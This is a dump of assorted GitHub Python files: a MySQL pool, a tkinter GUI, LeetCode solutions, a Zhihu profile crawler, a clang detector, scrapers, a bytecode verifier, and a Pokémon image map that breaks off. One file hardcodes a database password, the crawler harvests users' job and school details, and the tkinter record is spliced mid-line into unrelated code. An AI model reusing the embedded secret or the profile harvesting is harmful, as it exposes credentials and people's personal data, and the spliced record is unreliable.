+{"seq_id":"26860199731","text":"from DBUtils.PooledDB import PooledDB\nimport pymysql\nPOOL = PooledDB(\n creator=pymysql, # 使用链接数据库的模块\n maxconnections=6, # 连接池允许的最大连接数,0或None表示不限制\n mincached=2, # 初始时链接池中至少创建的空闲链接,0表示不创建\n maxcached=5, # 链接池中最多闲置的链接,0或None表示不限制\n maxshared=3, # 链接池中最多共享的链接数据\n blocking=True, # 连接池中如果没有可用连接后是否阻塞等待。True 等待、False不等待报错\n maxusage=None, # 一个链接最多被重复使用的次数,None表示不限制\n setsession=[], # 会话前执行的命令列表\n ping=0, # 检查服务是否可用\n # pymysql 连接配置\n host=\"127.0.0.1\",\n user=\"lance\",\n password=\"LANCEyuan88\",\n database=\"codepy\",\n charset=\"utf8\"\n)\n\n\nclass DataBase(object):\n def conn(self):\n conn = POOL.connection()\n # cursor = conn.cursor(cursor=pymysql.cursors.DictCursor)\n cursor = conn.cursor()\n # cursor.execute(\"select * from app01_book\")\n return conn, cursor\n def get_one(self, sql, args):\n conn, cursor = self.conn()\n cursor.execute(sql, args)\n data = cursor.fetchone()\n cursor.close()\n conn.close()\n return data\n def get_all(self, sql, args):\n conn, cursor = self.conn()\n cursor.execute(sql, args)\n data = cursor.fetchall()\n cursor.close()\n conn.close()\n return data\n\n","repo_name":"LanceYuan/codepyFlask","sub_path":"DBpool.py","file_name":"DBpool.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"28956565151","text":"from tkinter import ttk\nfrom tkinter import *\n\n# (\"I Curso\")\n# (\"II Semestre\")\n# (\"III Su Nobre Completo\")\n# (\"IV Su Número De Carné\")\nclass Desk:\n def __init__(self, window):\n \n anchura = 1000 \n altura = 800\n \n self.wind = window\n\n self.wind.geometry(str(anchura)+'x'+str(altura))\n \n self.wind.columnconfigure(0, weight=1)\n \n self.wind.title('Examen Final')\n\n frame = LabelFrame(self.wind, text = 'Calificacion')\n frame.grid(row = 0, column = 0, columnspan = 3, pady = 20)\n \n Label(frame, text = 'Ingrese el primer numero: ').grid(row = 1, column = 0)\n \n self.var1 = Entry(frame)\n self.var1.focus()\n self.var1.grid(row = 1, column = 1)\n \n Label(frame, text = 'Ingrese el segundo numero: ').grid(row = 2, column = 0)\n self.var2 = Entry(frame)\n self.var2.grid(row = 2, column = 1)\n \n\n Label(frame, text = 'Ingrse el segundo numero: ').grid(row = 3, column = 0)\n self.var3 = Entry(frame)\n self.var3.grid(row = 3, column = 1)\n \n \n Button (frame, text = 'Iniciar', command = self.bottonR).grid(row = 6, columnspan = 5, sticky = W + E)\n Button (frame, text = 'Mostrar', command = self.bottonD).grid(row = 7, columnspan = 5, sticky = W + E)\n \n self.message = Label(text = '', fg = 'red')\n self.message.grid(row = 3, column = 0, columnspan = 2, sticky = W + E)\n\n \n def bottonR(self):\n a=float(self.var1.get())\n b=float(self.var2.get())\n c=float(self.var3.get())\n if (a 1\n# B -> 2\n# C -> 3\n# ...\n# Z -> 26\n# AA -> 27\n# AB -> 28\n# ...\n#\n#\n# 示例 1:\n#\n# 输入: \"A\"\n# 输出: 1\n#\n#\n# 示例 2:\n#\n# 输入: \"AB\"\n# 输出: 28\n#\n#\n# 示例 3:\n#\n# 输入: \"ZY\"\n# 输出: 701\n#\n# 致谢:\n# 特别感谢 @ts 添加此问题并创建所有测试用例。\n#\n#\n\n\nclass Solution:\n def titleToNumber(self, s: str) -> int:\n res = 0\n for i in s:\n res = 26 * res + ord(i) - 64\n return res\n","repo_name":"ZodiacSyndicate/leet-code-solutions","sub_path":"easy/171.excel表列序号/171.excel表列序号.py","file_name":"171.excel表列序号.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"36"}
+{"seq_id":"1161949159","text":"'''The program extracts values of student number and grade from\na .txt file (grades_program.txt) and creates a dictionary using these values'''\n\nimport tkinter.filedialog\n\ndef main():\n \n grade_file = open(tkinter.filedialog.askopenfilename())\n print (read_grades(grade_file))\n grade_file.close()\n \n \n\ndef read_grades(gradefile):\n\n \n ## skip over the header.\n line = gradefile.readline()\n while line != '\\n':\n line = gradefile.readline()\n \n\n ## Read the grades, accumulating them into a dict.\n grade_to_ids = {}\n line = gradefile.readline()\n\n while line != '':\n student_id = line[:4]\n grade = float(line[4:].strip())\n\n if grade not in grade_to_ids:\n grade_to_ids[grade] = [student_id]\n else:\n grade_to_ids[grade].append(student_id)\n \n line = gradefile.readline()\n\n return grade_to_ids\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"andrewbells/python_learning","sub_path":"coursera/populate_dict.py","file_name":"populate_dict.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"74494640103","text":"# -*- coding: utf-8 -*-\nimport requests\nfrom lxml import etree\nimport math\nimport json\nimport time\n\n\nclass Crawler(object):\n def get_page_html(self, url):\n \"\"\"\n 获取页面源码\n :param url:页面url\n :return: 页面源码\n \"\"\"\n if url:\n headers = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'\n '(KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36',\n 'cookie': 'cookie' # 这里填写你自己的登入的cookie\n }\n r = requests.get(url, headers=headers)\n print(\"正在获取{}的网页源码,状态码为{}\".format(url, r.status_code))\n # 爬取延时\n time.sleep(0.2)\n print(r.status_code)\n if r.status_code == 200:\n r.encoding = 'utf-8'\n return r.text\n return None\n\n def get_following_urls(self, userinfo_page_url, following_num):\n \"\"\"\n 根据用户主页拼接关注列表的url\n :param userinfo_page_url:\n :param following_num:\n :return:\n \"\"\"\n if not following_num:\n return None\n base_following_url = '/followees?include=data%5B*%5D.answer_count%2Carticles_count%2Cgender%2C' \\\n 'follower_count%2Cis_followed%2Cis_following%2Cbadge%5B%3F(type%3Dbest_answerer)%5' \\\n 'D.topics&offset={}&limit={}'\n page_nums = math.ceil(int(following_num.replace(',', '')) / 20)\n for i in range(int(page_nums)):\n following_url = userinfo_page_url.replace('people', 'api/v4/members') + base_following_url.format(i * 20, (\n i + 1) * 20)\n yield following_url\n\n def get_new_urls(self, following_json):\n \"\"\"\n 获取新的URL\n :param following_json:\n :return:\n \"\"\"\n if not following_json:\n return None\n # 解析返回的json数据\n base_url = 'https://www.zhihu.com'\n user_urls = []\n following_info_json = json.loads(following_json)\n items = following_info_json['data']\n for item in items:\n url_type = item['type']\n url_token = item['url_token']\n user_url = base_url + '/{}/{}'.format(url_type, url_token)\n print(\"爬取到新的用户链接:{}\".format(user_url))\n user_urls.append(user_url)\n return user_urls\n\n def get_userinfo(self, userinfo_url, user_page_html):\n \"\"\"\n 获取用户的详细信息\n :param userinfo_url:\n :param user_page_html:\n :return:\n \"\"\"\n if not user_page_html:\n return None\n print('正在爬取{}'.format(userinfo_url))\n user_page_html = etree.HTML(user_page_html)\n username = \"\".join(user_page_html.xpath('//span[@class=\"ProfileHeader-name\"]/text()'))\n follow_num = user_page_html.xpath(\n '//div[@class=\"NumberBoard FollowshipCard-counts NumberBoard--divider\"]//strong/text()')\n if not follow_num:\n return None\n following_num = follow_num[0]\n followers_num = follow_num[1]\n user_avatar_url = user_page_html.xpath('//img[@class=\"Avatar Avatar--large UserAvatar-inner\"]/@src')[0]\n userinfo_detail_items = user_page_html.xpath('//div[@class =\"ProfileHeader-infoItem\"]')\n if userinfo_detail_items:\n jobs = userinfo_detail_items[0].xpath('.//text()')\n if len(userinfo_detail_items) > 1:\n school = userinfo_detail_items[1].xpath('.//text()')\n else:\n school = []\n userinfo_detail = {\n 'jobs': jobs,\n 'school': school\n }\n else:\n userinfo_detail = []\n userinfo = {\n 'username': username,\n 'user_url': userinfo_url,\n 'following_num': following_num,\n 'followers_num': followers_num,\n 'user_avatar_url': user_avatar_url,\n 'userinfo_deail': userinfo_detail\n }\n print('爬取到用户信息:{}'.format(userinfo))\n return userinfo\n\n def main(self, userinfo_url):\n \"\"\"\n 主程序\n :param userinfo_url:\n :return:\n \"\"\"\n new_urls = []\n user_page_html = self.get_page_html(userinfo_url)\n if user_page_html:\n userinfo = self.get_userinfo(userinfo_url, user_page_html)\n if userinfo:\n following_urls = self.get_following_urls(userinfo_url, userinfo['following_num'])\n for following_url in following_urls:\n following_html = self.get_page_html(following_url)\n new_urls.extend(self.get_new_urls(following_html))\n return userinfo, new_urls\n return None, None\n\n\nif __name__ == '__main__':\n a = Crawler()\n a.main('https://www.zhihu.com/people/kmxz')\n","repo_name":"xieys/zhihu_spider","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":5001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"16009371781","text":"import re\nfrom utils.subprocess import get_output\n\n_command_candidate_patterns = ['clang(\\.exe)?$','clang-[A-Za-z0-9]*[0-9]+(\\.exe)?$', 'clang\\+\\+(\\.exe)?$', 'clang\\+\\+-[A-Za-z0-9]*[0-9]+(\\.exe)?$']\n_apple_llvm_pattern='Apple LLVM version ([0-9\\.]+)'\n_clangc2_pattern='clang with Microsoft CodeGen'\n_clang_version_pattern='clang version (\\d\\.\\d\\.\\d[^\\s]*)'\n\ndef _is_it_different_clang(output, patterns):\n for pattern in patterns:\n match = re.search(pattern, output)\n if match:\n return True\n return False\n\ndef _is_it_really_clang(command, patterns, out=None):\n for pattern in patterns:\n if re.search(pattern, command):\n output = get_output([command, \"--version\"])\n if not _is_it_different_clang(output, [_apple_llvm_pattern, _clangc2_pattern]):\n return True\n else:\n out.trace(\"[clng] {}: It is not vanilla Clang (e.g. Apple, or ClangC2). Aborting.\".format(command))\n return False\n\ndef _detect_clang_version(command, out=None):\n output = get_output([command, \"--version\"])\n match = re.search(_clang_version_pattern, output)\n if not match:\n out.warning(\"[clng] {}: could not find version string\".format(command))\n out.debug(\"[clng] {}: {}\".format(command, output))\n return \"unknown\"\n return match.group(1)\n\ndef _detect_clang(command, out=None):\n if not command:\n return None\n\n if not _is_it_really_clang(command, _command_candidate_patterns, out):\n if out:\n out.trace(\"[clng] {} is not Clang\".format(command))\n return None\n\n version=_detect_clang_version(command, out)\n out.info(\"[clng] {}: found Clang version {}\".format(command, version))\n\n options=[]\n meta = {\n \"tool\": \"clang\",\n \"path\": command,\n \"version\": version,\n \"options\": options\n }\n return meta\n\n\ndef run(command, out=None):\n ret = _detect_clang(command, out)\n if ret:\n return [ret]\n return None\n","repo_name":"unjello/findc","sub_path":"find_compiler/toolchain/matcher/clang/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"20550648548","text":"'''\nfit_transform(X):用X来训练PCA模型,同时返回降维后的数据。\ncomponents_不明白\n'''\nfrom numpy.random import RandomState\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import fetch_olivetti_faces\nfrom sklearn import decomposition\n\nn_row, n_col = 2, 3\nn_components = n_row * n_col\nimage_shape = (64, 64)\n\n###############################################################################\n# Load faces data\ndataset = fetch_olivetti_faces(shuffle=True, random_state=RandomState(0))\nfaces = dataset.data\n# (6,4096)\nprint(faces.shape)\n\n\n###############################################################################\ndef plot_gallery(title, images, n_col=n_col, n_row=n_row):\n # 子图 figsize(2*3,2.26*2) 生成图像的宽和长\n plt.figure(figsize=(2. * n_col, 2.26 * n_row))\n # 总图标题\n plt.suptitle(title, size=16)\n # 得到images 的序号和数据\n for i, comp in enumerate(images):\n # 第几个子图 subplot(2,3,1)\n plt.subplot(n_row, n_col, i + 1)\n vmax = max(comp.max(), -comp.min())\n # 显示子图,\n plt.imshow(comp.reshape(image_shape), cmap=plt.cm.gray,\n interpolation='nearest', vmin=-vmax, vmax=vmax)\n # 将子图的横纵坐标去掉\n plt.xticks(())\n plt.yticks(())\n plt.subplots_adjust(0.01, 0.05, 0.99, 0.94, 0.04, 0.)\n\n\nplot_gallery(\"First centered Olivetti faces\", faces[:n_components])\n###############################################################################\n\nestimators = [\n ('Eigenfaces - PCA using randomized SVD',\n decomposition.PCA(n_components=6, whiten=True)),\n\n ('Non-negative components - NMF',\n decomposition.NMF(n_components=6, init='nndsvda', tol=5e-3))\n]\n\n###############################################################################\n\nfor name, estimator in estimators:\n print(\"Extracting the top %d %s...\" % (n_components, name))\n print(faces.shape)\n estimator.fit(faces)\n # 是W\n components_ = estimator.components_\n print('components_[:6].shape:')\n print(components_[:6].shape)\n # print(components_[:,n_components].shape)\n plot_gallery(name, components_[:n_components])\n\n# plt.show()\n","repo_name":"dpp1013/Sklearn_ML","sub_path":"NMF.py","file_name":"NMF.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"72170636585","text":"import requests\nfrom lxml import etree\nimport re\n\nurl = \"https://ssr1.scrape.center\"\nhtml = requests.get(url).text\n\n\nroot = etree.HTML(html)\n\nxpath = \"//img/@src\"\nimgs = root.xpath(xpath)\n\ni = 1\nfor imgPlace in imgs:\n if re.match(\"^h.*\", str(imgPlace)):\n print(imgPlace)\n response = requests.get(imgPlace)\n print(response.content)\n # 将图片内容保存到本地文件\n with open(\"../data/imgdata/SSR1_{}.jpg\".format(i), \"wb\") as f:\n f.write(response.content)\n print(\"图片已保存\")\n i += 1\n\n","repo_name":"cumin1/SpiderStudyCode","sub_path":"xpath_mate/SSR1.py","file_name":"SSR1.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"3458633407","text":"class Solution(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n dic = {} # '1'-> a\n for i in range(1, 27):\n dic[str(i)] = chr( i + ord('a') )\n\n f = [[ 0 for j in range(2)] for i in range(len(s) + 1)]\n for i in range( 1, len(s) + 1 ):\n if i == 1:\n f[i][0] = 1 if s[i - 1] in dic else 0\n else:\n if s[i-1:i] in dic:\n f[i][0] = max(f[i-1][0], f[i-1][1])\n if s[i-2:i] in dic:\n f[i][1] = max(f[i-2][0], f[i-2][1])\n\n\n return f[-1]\n\nclass Solution(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 1\n f = [0] * len(s)\n\n dic = {} # '1'-> a\n for i in range(1, 27):\n dic[str(i)] = chr(i + ord('a'))\n\n f = [0] * (len(s) + 1)\n f[0] = 1\n\n for i in range(1, len(s) + 1):\n f[i] = 0\n if ord('1') <= ord(s[i-1]) and ord(s[i-1]) <= ord('9'):\n f[i] += f[i - 1]\n\n if i > 1:\n j = 10 * ( ord(s[i-2]) - ord('0') ) + ord(s[i-1]) - ord('0')\n if 10 <= j and j <= 26:\n f[i] += f[i - 2]\n\n return f[-1]\n\n\nclass Solution(object):\n def numDecodings(self, s):\n \"\"\"\n 转移方程:\n 对于一个digit满足1-9时,f[i] = f[i-1]\n 对于连续的两个字母满足10-24时, f[i] = f[i-1] + f[i-2]\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 0\n\n f = [0] * (len(s) + 1)\n\n f[0] = 1 #创建这个初始条件,主要是因为方便转移方程\n for i in range(1, len(s) + 1):\n temp = ord(s[i-1]) - ord('0')\n if temp > 0 and temp < 10:\n f[i] = f[i-1]\n if i > 1:\n temp = 10 * ( ord(s[i-2]) - ord('0') ) + ( ord(s[i-1]) - ord('0') )\n if 10 <= temp and temp <= 26:\n f[i] += f[i - 2]\n\n return f[-1]\n\n\n\n\nif __name__ == '__main__':\n # s = \"12\"\n # s = \"226\"\n # s = \"0\"\n # s = \"012\"\n # s = \"1\"\n s = \"10\"\n\n\n print(Solution().numDecodings(s))\n","repo_name":"pi408637535/Algorithm","sub_path":"com/study/algorithm/daily/91. Decode Ways.py","file_name":"91. Decode Ways.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"3184471231","text":"# -*- coding: utf8 -*-\n\nfrom ..instructions import InsReturn, InsGoto, InsBranch\nfrom .. import opcodes\nfrom ..exceptions import VerifyException\nfrom .frame import Frame\nfrom .controlflow import ControlFlowAnalyzer\n\n\nclass Verifier():\n\n def __init__(self, interpreter):\n self.interpreter = interpreter\n self.changed = None\n self.frames = None\n self.queue = []\n self.method = None\n\n def verify(self, method):\n self.verify_jump_points(method)\n self.verify_load_store_vars(method)\n self.verify_return(method)\n self.verify_values(method)\n return True\n\n def verify_jump_points(self, method):\n for i, inst in enumerate(method.code):\n if inst.opcode == opcodes.GOTO or isinstance(inst, InsBranch):\n if inst.argument.value < 0 or inst.argument.value >= len(method.code):\n raise VerifyException('instruction %s jump target %s outside boundary <0, %s>' %\n (inst, inst.argument.value, len(method.code) - 1))\n return True\n\n def verify_load_store_vars(self, method):\n for inst in method.code:\n if inst.opcode in [opcodes.ISTORE, opcodes.FSTORE, opcodes.ASTORE]:\n pos = inst.argument.value\n lv = method.variables[pos]\n vt = self.interpreter.new_value(lv.vtype)\n self.interpreter.copy_operation(inst, vt)\n return True\n\n def verify_return(self, method):\n cfa = ControlFlowAnalyzer()\n bbs = cfa.analyze(method)\n for bb in bbs:\n end_ins = method.code[bb.end_inst_index]\n if not bb.sucessors and not isinstance(end_ins, InsReturn):\n raise VerifyException('leaf basic block does not end with return instruction, but wirh %s' % end_ins)\n return True\n\n def verify_values(self, method):\n self.method = method\n self.changed = [False for _ in method.code]\n self.frames = [None for _ in method.code]\n\n current = Frame()\n current.set_return(self.interpreter.new_value(method.return_type.vtype))\n\n for i, v in enumerate(method.variables):\n if i < method.argument_count:\n current.add_local(self.interpreter.new_value(v.vtype))\n else:\n current.add_local(self.interpreter.new_value(None))\n current.add_local_type(self.interpreter.new_value(v.vtype))\n\n self.merge(0, current)\n\n while self.queue:\n ins_int = self.queue.pop()\n ins = method.code[ins_int]\n frame = self.frames[ins_int]\n self.changed[ins_int] = False\n\n current = frame.copy()\n current.execute(ins, self.interpreter)\n if not isinstance(ins, InsReturn) and not isinstance(ins, InsGoto):\n self.merge(ins_int + 1, current)\n\n if isinstance(ins, InsGoto) or isinstance(ins, InsBranch):\n self.merge(ins.argument.value, current)\n\n return True\n\n def merge(self, i, frame):\n old_frame = self.frames[i]\n changes = False\n\n if old_frame is None:\n self.frames[i] = frame.copy()\n changes = True\n else:\n changes = old_frame.merge(frame, self.interpreter)\n\n if changes and not self.changed[i]:\n self.changed[i] = True\n self.queue.append(i)\n","repo_name":"lukleh/Tiny-Stackbased-Virtual-Machine-in-Python","sub_path":"TSBVMIP/analysis/verifier.py","file_name":"verifier.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"}
+{"seq_id":"26771792719","text":"import requests\nfrom fake_useragent import UserAgent\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n\ndef link():\n url = 'https://kugoo-samokat.ru/elektrosamokat-kugoo-s3#!/tab/333312074-2'\n res = requests.get(url, headers={'User-Agent': UserAgent().chrome})\n html = res.content\n soup = BeautifulSoup(html, 'html.parser')\n name = soup.find('h1', attrs={'class': 'js-product-name'}).text\n\n d = {\n 'Категория': 'Электросамокаты',\n 'Цвет': 'черный',\n 'Бренд': 'Kugoo',\n 'Пол': '',\n 'Название': soup.find('h1', attrs={'class': 'js-product-name'}).text,\n 'Артикул товара': '0001',\n 'Баркод товара': '0001',\n 'Цена': soup.find('div', attrs={'class': 't762__price-value'}).text,\n 'Состав': '',\n 'Описание': '',\n 'Гарантийный срок': '1 год',\n 'Время зарядки': soup.find('div', attrs={'field': 'tn_text_1610137288297'}).text,\n 'Максимальная скорость': soup.find('div', attrs={'field': 'tn_text_1610130533629'}).text,\n 'Питание': 'от аккумулятора'\n }\n z = pd.DataFrame(d, index=[0])\n z.to_excel('name.xlsx')\n\n\nif __name__ == \"__main__\":\n link()\n","repo_name":"eugenerush/parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"358669428","text":"poke_names = {\n\n \"Bulbasaur\" : \"1.png\",\n \"Ivysaur\" : \"2.png\",\n \"Vensaur\" : \"3.png\",\n \"Charmander\": \"4.png\",\n \"Charmeleon\": \"5.png\",\n \"Charizard\" : \"6.png\",\n \"Squirtle\" : \"7.png\",\n \"Wartortle\" : \"8.png\",\n \"Blastoise\" : \"9.png\",\n \"Caterpie\" : \"10.png\",\n \"Metapod\" : \"11.png\",\n \"Butterfree\": \"12.png\",\n \"Weedle\" : \"13.png\",\n \"Kakuna\" : \"14.png\",\n \"Beedrill\" : \"15.png\",\n \"Pidgey\" : \"16.png\",\n \"Pidgeotto\" : \"17.png\",\n \"Pidgeot\" : \"18.png\",\n \"Rattata\" : \"19.png\",\n \"Raticate\" : \"20.png\",\n \"Spearow\" : \"21.png\",\n \"Fearow\" : \"22.png\",\n \"Ekans\" : \"23.png\",\n \"Arbok\" : \"24.png\",\n \"Pikachu\" : \"25.png\",\n \"Raichu\" : \"26.png\",\n \"Sandshrew\" : \"27.png\",\n \"Sandslash\" : \"28.png\",\n \"Nidoran F\" : \"29.png\",\n \"Nidorina\" : \"30.png\",\n \"Nidoqueen\" : \"31.png\",\n \"Nidoran M\" : \"32.png\",\n \"Nidorino\" : \"33.png\",\n \"Nidoking\" : \"34.png\",\n \"Clefairy\" : \"35.png\",\n \"Clefable\" : \"36.png\",\n \"Vulpix\" : \"37.png\",\n \"Ninetales\" : \"38.png\",\n \"Jigglypuff\": \"39.png\",\n \"Wigglytuff\": \"40.png\",\n \"Zubat\" : \"41.png\",\n \"Golbat\" : \"42.png\",\n \"Oddish\" : \"43.png\",\n \"Gloom\" : \"44.png\",\n \"Vileplume\" : \"45.png\",\n \"Paras\" : \"46.png\",\n \"Parasect\" : \"47.png\",\n \"Venonat\" : \"48.png\",\n \"Venomoth\" : \"49.png\",\n \"Diglett\" : \"50.png\",\n \"Dugtrio\" : \"51.png\",\n \"Meowth\" : \"52.png\",\n \"Persian\" : \"53.png\",\n \"Psyduck\" : \"54.png\",\n \"Golduck\" : \"55.png\",\n \"Mankey\" : \"56.png\",\n \"Primeape\" : \"57.png\",\n \"Growlithe\" : \"58.png\",\n \"Arcanine\" : \"59.png\",\n \"Poliwag\" : \"60.png\",\n \"Poliwhirl\" : \"61.png\",\n \"Poliwrath\" : \"62.png\",\n \"Abra\" : \"63.png\",\n \"Kadabra\" : \"64.png\",\n \"Alakazam\" : \"65.png\",\n \"Machop\" : \"66.png\",\n \"Machoke\" : \"67.png\",\n \"Machamp\" : \"68.png\",\n \"Bellsprout\": \"69.png\",\n \"Weepinbell\": \"70.png\",\n \"Victreebel\": \"71.png\",\n \"Tentacool\" : \"72.png\",\n \"Tentacruel\": \"73.png\",\n \"Geodude\" : \"74.png\",\n \"Graveler\" : \"75.png\",\n \"Golem\" : \"76.png\",\n \"Ponyta\" : \"77.png\",\n \"Rapidash\" : \"78.png\",\n \"Slowpoke\" : \"79.png\",\n \"Slowbro\" : \"80.png\",\n \"Magnemite\" : \"81.png\",\n \"Magneton\" : \"82.png\",\n \"Farfetch'd\": \"83.png\",\n \"Doduo\" : \"84.png\",\n \"Dodrio\" : \"85.png\",\n \"Seel\" : \"86.png\",\n \"Dewgong\" : \"87.png\",\n \"Grimer\" : \"88.png\",\n \"Muk\" : \"89.png\",\n \"Shellder\" : \"90.png\",\n \"Cloyster\" : \"91.png\",\n \"Gastly\" : \"92.png\",\n \"Haunter\" : \"93.png\",\n \"Gengar\" : \"94.png\",\n \"Onix\" : \"95.png\",\n \"Drowzee\" : \"96.png\",\n \"Hypno\" : \"97.png\",\n \"Krabby\" : \"98.png\",\n \"Kingler\" : \"99.png\",\n \"Voltorb\" : \"100.png\",\n \"Electrode\" : \"101.png\",\n \"Exeggcute\" : \"102.png\",\n \"Exeggutor\" : \"103.png\",\n \"Cubone\" : \"104.png\",\n \"Marowak\" : \"105.png\",\n \"Hitmonlee\" : \"106.png\",\n \"Hitmonchan\": \"107.png\",\n \"Lickitung\" : \"108.png\",\n \"Koffing\" : \"109.png\",\n \"Weezing\" : \"110.png\",\n \"Rhyhorn\" : \"111.png\",\n \"Rhydon\" : \"112.png\",\n \"Chansey\" : \"113.png\",\n \"Tangela\" : \"114.png\",\n \"Kangaskhan\": \"115.png\",\n \"Horsea\" : \"116.png\",\n \"Seadra\" : \"117.png\",\n \"Goldeen\" : \"118.png\",\n \"Seaking\" : \"119.png\",\n \"Staryu\" : \"120.png\",\n \"Starmie\" : \"121.png\",\n \"Mr. Mime\" : \"122.png\",\n \"Scyther\" : \"123.png\",\n \"Jynx\" : \"124.png\",\n \"Electabuzz\": \"125.png\",\n \"Magmar\" : \"126.png\",\n \"Pinsir\" : \"127.png\",\n \"Tauros\" : \"128.png\",\n \"Magikarp\" : \"129.png\",\n \"Gyarados\" : \"130.png\",\n \"Lapras\" : \"131.png\",\n \"Ditto\" : \"132.png\",\n \"Eevee\" : \"133.png\",\n \"Vaporeon\" : \"134.png\",\n \"Jolteon\" : \"135.png\",\n \"Flareon\" : \"136.png\",\n \"Porygon\" : \"137.png\",\n \"Omanyte\" : \"138.png\",\n \"Omastar\" : \"139.png\",\n \"Kabuto\" : \"140.png\",\n \"Kabutops\" : \"141.png\",\n \"Aerodactyl\": \"142.png\",\n \"Snorlax\" : \"143.png\",\n \"Articuno\" : \"144.png\",\n \"Zapdos\" : \"145.png\",\n \"Moltres\" : \"146.png\",\n \"Dratini\" : \"147.png\",\n \"Dragonair\" : \"148.png\",\n \"Dragonite\" : \"149.png\",\n \"Mewtwo\" : \"150.png\",\n \"Mew\" : \"151.png\",\n \"Chikorita\" : \"152.png\",\n \"Bayleef\" : \"153.png\",\n \"Meganium\" : \"154.png\",\n \"Cyndaquil\" : \"155.png\",\n \"Quilava\" : \"156.png\",\n \"Typhlosion\": \"157.png\",\n \"Totodile\" : \"158.png\",\n \"Feraligatr\": \"159.png\",\n \"Sentret\" : \"160.png\",\n \"Furret\" : \"161.png\",\n \"Hoothoot\" : \"162.png\",\n \"Noctowl\" : \"163.png\",\n \"Ledyba\" : \"164.png\",\n \"Ledian\" : \"165.png\",\n \"Spinarak\" : \"166.png\",\n \"Ariados\" : \"167.png\",\n \"Ariados\" : \"168.png\",\n \"Crobat\" : \"169.png\",\n \"Chinchou\" : \"170.png\",\n \"Lanturn\" : \"171.png\",\n \"Pichu\" : \"172.png\",\n \"Cleffa\" : \"173.png\",\n \"Igglybuff\" : \"174.png\",\n \"Togepi\" : \"175.png\",\n \"Togetic\" : \"176.png\",\n \"Natu\" : \"177.png\",\n \"Xatu\" : \"178.png\",\n \"Mareep\" : \"179.png\",\n \"Flaaffy\" : \"180.png\",\n \"Ampharos\" : \"181.png\",\n \"Bellossom\" : \"182.png\",\n \"Marill\" : \"183.png\",\n \"Azumarill\" : \"184.png\",\n \"Sudowoodo\" : \"185.png\",\n \"Politoed\" : \"186.png\",\n \"Hoppip\" : \"187.png\",\n \"Skiploom\" : \"188.png\",\n \"Jumpluff\" : \"189.png\",\n \"Aipom\" : \"190.png\",\n \"Sunkern\" : \"191.png\",\n \"Sunflora\" : \"192.png\",\n \"Yanma\" : \"193.png\",\n \"Wooper\" : \"194.png\",\n \"Quagsire\" : \"195.png\",\n \"Espeon\" : \"196.png\",\n \"Umbreon\" : \"197.png\",\n \"Murkrow\" : \"198.png\",\n \"Slowking\" : \"199.png\",\n \"misdreavus\": \"200.png\",\n \"Unown\" : \"201.png\",\n \"Wobbuffet\" : \"202.png\",\n \"Girafarig\" : \"203.png\",\n \"Pineco\" : \"204.png\",\n \"Forretress\": \"205.png\",\n \"Dunsparce\" : \"206.png\",\n \"Gligar\" : \"207.png\",\n \"Steelix\" : \"208.png\",\n \"Snubbull\" : \"209.png\",\n \"Granbull\" : \"210.png\",\n \"Qwilfish\" : \"211.png\",\n \"Scizor\" : \"212.png\",\n \"Shuckle\" : \"213.png\",\n \"Heracross\" : \"214.png\",\n \"Sneasel\" : \"215.png\",\n \"Teddiursa\" : \"216.png\",\n \"Ursaring\" : \"217.png\",\n \"Slugma\" : \"218.png\",\n \"Magcargo\" : \"219.png\",\n \"Swinub\" : \"220.png\",\n \"Piloswine\" : \"221.png\",\n \"Corsola\" : \"222.png\",\n \"Remoraid\" : \"223.png\",\n \"Octillery\" : \"224.png\",\n \"Delibird\" : \"225.png\",\n \"Mantine\" : \"226.png\",\n \"Skarmory\" : \"227.png\",\n \"Houndour\" : \"228.png\",\n \"Houndoom\" : \"229.png\",\n \"Kingdra\" : \"230.png\",\n \"Phanpy\" : \"231.png\",\n \"Donphan\" : \"232.png\",\n \"Porygon2\" : \"233.png\",\n \"Stantler\" : \"234.png\",\n \"Smeargle\" : \"235.png\",\n \"Tyrouge\" : \"236.png\",\n \"Hitmontop\" : \"237.png\",\n \"Smoochum\" : \"238.png\",\n \"Elekid\" : \"239.png\",\n \"Magby\" : \"240.png\",\n \"Miltank\" : \"241.png\",\n \"Blissey\" : \"242.png\",\n \"Raikou\" : \"243.png\",\n \"Entei\" : \"244.png\",\n \"Suicune\" : \"245.png\",\n \"Lavitar\" : \"246.png\",\n \"Pupitar\" : \"247.png\",\n \"Tyranitar\" : \"248.png\",\n \"Lugia\" : \"249.png\",\n \"Ho-Oh\" : \"250.png\",\n \"Celebi\" : \"251.png\",\n \"Treecko\" : \"252.png\",\n \"Grovyle\" : 